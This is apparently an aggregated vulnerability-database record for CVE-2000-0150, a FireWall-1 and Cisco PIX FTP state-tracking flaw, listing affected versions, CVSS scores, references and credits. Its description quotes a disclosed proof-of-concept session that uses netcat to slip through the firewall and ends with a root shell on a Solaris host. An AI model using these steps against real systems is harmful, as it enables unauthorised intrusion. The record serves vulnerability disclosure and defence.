ID

VAR-200002-0050


CVE

CVE-2000-0150


TITLE

Multiple vendors' firewalls do not adequately keep state of FTP traffic

Trust: 0.8

sources: CERT/CC: VU#328867

DESCRIPTION

Check Point Firewall-1 allows remote attackers to bypass port access restrictions on an FTP server by forcing it to send malicious packets that Firewall-1 misinterprets as a valid 227 response to a client's PASV attempt. Firewalls and other systems that inspect FTP application layer traffic may not adequately maintain the state of FTP commands and responses. As a result, an attacker could establish arbitrary TCP connections to FTP servers or clients located behind a vulnerable firewall. A vulnerability exists in the way that Checkpoint FireWall-1 handles packets sent from an FTP server to a connecting client. An attacker may be able to exploit this weakness to establish connections to any machine residing behind a FireWall-1 machine, or send packets in to a network protected by a FireWall-1. FireWall-1 monitors packets from the FTP server to the client, looking for the string "227 " at the beginning of each packet. If FW-1 finds a packet which matches this criteria, it will extract the destination address and port, verify that the specified destination address matches the source of the packet, and allow TCP connections through the firewall to the destination IP and port. In FireWall-1 4.0, these TCP connections can only send data in one direction. Under FireWall-1 3.0 and prior, this limitation does not exist. In addition, under FW-1 4.0 the data cannot be travelling to a port that is defined in FW-1's list of well known TCP services. The details of the vulnerability posted by John McDonald <jm@dataprotect.com> contained the following example: "Here is an example of an attack based on this technique. There is a FireWall-1 machine between gumpe and the 172.16.0.2 server, which only permits incoming FTP connections. 172.16.0.2 is a default Solaris 2.6 install, with the Tooltalk Database vulnerability. We send the datagram directly to the service's TCP port, in spite of this port being blocked by the firewall. Note that since there is no response expected, the one-way restriction doesn't affect this attack. All of our testing was done on a Nokia IPSO machine running FW-1 version 4.0.SP-4. [root@gumpe /root]# strings hackfile localhost """"3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f /usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd [root@gumpe /root]# /sbin/ifconfig eth0 mtu 100 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [1]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 80, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. ...........................................227 (172,16,0,2,128,7) 500 '........................................... [2]+ Stopped nc -vvv 172.16.0.2 21 [root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 1168, rcvd 0 [root@gumpe /root]# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open id uid=0(root) gid=0(root) There is an easier way to perform a similar attack on this setup, since the default Solaris FTP daemon allows a bounce attack, but this should suffice to demonstrate the potential severity of this problem." In summary, if a network has an FTP server accesible behind a FireWall-1 firewall, that they allow the outside world access to, it may be possible for an attacker to open TCP connections to certain ports on that FTP machine. This vulnerability is not specific to Firewall-1. It has been demonstrated that the PIX firewall, from Cisco, is also vulnerable. Check Point Firewall-1 is vulnerable

Trust: 1.98

sources: NVD: CVE-2000-0150 // CERT/CC: VU#328867 // BID: 979 // VULHUB: VHN-1729

AFFECTED PRODUCTS

vendor:checkpointmodel:firewall-1scope:eqversion:4.0

Trust: 1.6

vendor:checkpointmodel:firewall-1scope:eqversion:3.0

Trust: 1.6

vendor:ciscomodel:pix firewall softwarescope:eqversion:5.0

Trust: 1.0

vendor:ciscomodel:pix firewall softwarescope:eqversion:4.1\(6b\)

Trust: 1.0

vendor:ciscomodel:pix firewall softwarescope:eqversion:4.2\(2\)

Trust: 1.0

vendor:ciscomodel:pix firewall softwarescope:eqversion:4.3

Trust: 1.0

vendor:ciscomodel:pix firewall softwarescope:eqversion:4.1\(6\)

Trust: 1.0

vendor:ciscomodel:pix firewall softwarescope:eqversion:4.2\(1\)

Trust: 1.0

vendor:ciscomodel:pix firewall softwarescope:eqversion:4.4\(4\)

Trust: 1.0

vendor:ip filtermodel: - scope: - version: -

Trust: 0.8

vendor:netbsdmodel: - scope: - version: -

Trust: 0.8

vendor:watchguardmodel: - scope: - version: -

Trust: 0.8

vendor:ciscomodel:pix firewallscope:eqversion:5.0

Trust: 0.3

vendor:ciscomodel:pix firewallscope:eqversion:4.4(4)

Trust: 0.3

vendor:ciscomodel:pix firewallscope:eqversion:4.3

Trust: 0.3

vendor:ciscomodel:pix firewallscope:eqversion:4.2.2

Trust: 0.3

vendor:ciscomodel:pix firewallscope:eqversion:4.2.1

Trust: 0.3

vendor:ciscomodel:pix firewall bscope:eqversion:4.1.6

Trust: 0.3

vendor:ciscomodel:pix firewallscope:eqversion:4.1.6

Trust: 0.3

vendor:checkmodel:point software firewall-1scope:eqversion:4.0

Trust: 0.3

vendor:checkmodel:point software firewall-1scope:eqversion:3.0

Trust: 0.3

vendor:ciscomodel:pix firewallscope:neversion:5.1

Trust: 0.3

sources: CERT/CC: VU#328867 // BID: 979 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2000-0150
value: HIGH

Trust: 1.0

CARNEGIE MELLON: VU#328867
value: 24.10

Trust: 0.8

CNNVD: CNNVD-200002-044
value: HIGH

Trust: 0.6

VULHUB: VHN-1729
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2000-0150
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.0

VULHUB: VHN-1729
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CERT/CC: VU#328867 // VULHUB: VHN-1729 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2000-0150

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200002-044

TYPE

Design Error

Trust: 0.9

sources: BID: 979 // CNNVD: CNNVD-200002-044

EXTERNAL IDS

db:CERT/CCid:VU#328867

Trust: 2.5

db:BIDid:979

Trust: 2.0

db:NVDid:CVE-2000-0150

Trust: 1.7

db:OSVDBid:4417

Trust: 1.7

db:CNNVDid:CNNVD-200002-044

Trust: 0.6

db:VULHUBid:VHN-1729

Trust: 0.1

sources: CERT/CC: VU#328867 // VULHUB: VHN-1729 // BID: 979 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

REFERENCES

url:http://www.securityfocus.com/bid/979

Trust: 2.7

url:http://www.kb.cert.org/vuls/id/328867

Trust: 2.7

url:http://www.osvdb.org/4417

Trust: 2.7

url:http://www.ietf.org/rfc/rfc959.txt

Trust: 0.8

url:http://www.ietf.org/rfc/rfc2581.txt

Trust: 0.8

url:http://online.securityfocus.com/archive/1/47688/2000-02-12/2000-02-18/1

Trust: 0.8

url:http://online.securityfocus.com/archive/82/45758/2000-02-08/2000-02-14/1

Trust: 0.8

url:http://www.checkpoint.com/techsupport/

Trust: 0.3

url:http://www.cisco.com/warp/public/707/sec_incident_response.shtml

Trust: 0.3

url: -

Trust: 0.1

sources: CERT/CC: VU#328867 // VULHUB: VHN-1729 // BID: 979 // CNNVD: CNNVD-200002-044 // NVD: CVE-2000-0150

CREDITS

This vulnerability was posted to the Bugtraq mailing list on February 9, 2000 by John McDonald <jm@dataprotect.com>. It contained a set of work developed by both McDonald and Thomas Lopatic <tl@dataprotect.com>

Trust: 0.9

sources: BID: 979 // CNNVD: CNNVD-200002-044

SOURCES

db:CERT/CCid:VU#328867
db:VULHUBid:VHN-1729
db:BIDid:979
db:CNNVDid:CNNVD-200002-044
db:NVDid:CVE-2000-0150

LAST UPDATE DATE

2024-11-22T22:48:48.755000+00:00


SOURCES UPDATE DATE

db:CERT/CCid:VU#328867date:2003-03-07T00:00:00
db:VULHUBid:VHN-1729date:2018-10-30T00:00:00
db:BIDid:979date:2000-02-09T00:00:00
db:CNNVDid:CNNVD-200002-044date:2006-11-16T00:00:00
db:NVDid:CVE-2000-0150date:2024-11-20T23:31:49.937

SOURCES RELEASE DATE

db:CERT/CCid:VU#328867date:2002-10-08T00:00:00
db:VULHUBid:VHN-1729date:2000-02-12T00:00:00
db:BIDid:979date:2000-02-09T00:00:00
db:CNNVDid:CNNVD-200002-044date:2000-02-12T00:00:00
db:NVDid:CVE-2000-0150date:2000-02-12T05:00:00